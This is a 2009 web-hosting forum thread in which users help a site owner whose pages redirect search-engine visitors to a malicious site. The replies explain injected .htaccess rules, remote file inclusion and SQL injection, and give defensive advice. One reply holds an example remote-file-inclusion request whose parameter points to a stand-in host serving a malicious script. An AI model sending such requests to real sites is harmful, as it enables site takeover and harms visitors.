slick Posted May 4, 2009 Share Posted May 4, 2009 Hi. I have a website hosted at TCH. The domain name is trini-chat dot com. I've noticed lately that sometimes when I do a search for my site on Google and I click on the link it goes directly to another domain (http://europpc dot com/search.php?iw=1&links=trini+chat) and then that redirects to another site that Firefox deems dangerous. Any ideas what may be causing this? Thanks. Quote Link to comment Share on other sites More sharing options...
SteveW Posted May 5, 2009 Share Posted May 5, 2009 (edited) Look in your /public_html/.htaccess file for RewriteCond code that mentions search engine names and RewriteRule code that mentions names of sites other than yours, such as the europc site, or possibly a site that is identified only by IP address. If you find code like this, it is a common symptom of sites that have been compromised. When visitors go to your site from search engine results, they get redirected to the malicious site. If they go straight to your site, they don't get redirected. The .htaccess file would most likely have been changed by a malicious PHP script that the hacker "tricked" one of your .php web pages into running. It looks like many of your pages use input (query string) parameters such as "?name=Forums". When your script receives data by this way, it is important that it checks it carefully to guard against something called "remote file inclusion" <- a term to do a web search on. For example, if someone calls your page with ....filename.php?name=hxxp://someothersite.com/maliciousscript.txt, then your site, if your PHP code doesn't guard against it, will retrieve the malicious script and run it. You have to ensure that incoming values of "name" are only acted upon if they are legitimate values that you expect. Otherwise, the incoming data should be ignored. The above is the most common reason for this type of redirection. ----- It looks like you are using FlashChat. Look it up at http://secunia.com/advisories/search/. I know it has had some security vulnerabilities in the past, but I don't recall which ones or whether they are of a type that would be relevant to your current problem. Edited May 5, 2009 by SteveW Quote Link to comment Share on other sites More sharing options...
slick Posted May 10, 2009 Author Share Posted May 10, 2009 .htaccess file is clean but there seems to be some strange code on the index page as well as a few other pages Quote Link to comment Share on other sites More sharing options...
TCH-Thomas Posted May 10, 2009 Share Posted May 10, 2009 I would ask the help desk to check if the account has been compromised and as usual change the password to the account (a strong as possible password). As for the strange code, I would either clean it out myself or ask the help desk if its something they can help me with, then publish the file again and see if everything works as expected. Quote Link to comment Share on other sites More sharing options...
SteveW Posted May 10, 2009 Share Posted May 10, 2009 Also see Secunia about PHPNuke http://secunia.com/advisories/search/?search=phpnuke. There was a new vulnerability found a couple of months ago. It is an "SQL injection" vulnerability that allows outsiders to inject data into a MySQL database. If you look in the text of your static code pages on the server and don't find the malicious code in the page, it could be that it's stored in the database and being retrieved by whatever process is getting data out of the db to build the output page. It's important to keep all scripts updated to their latest versions. Quote Link to comment Share on other sites More sharing options...
JTD Posted May 11, 2009 Share Posted May 11, 2009 I would personally change nuke scripts. I will PM you a site that has a VERY secure nuke script that i personally have used. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.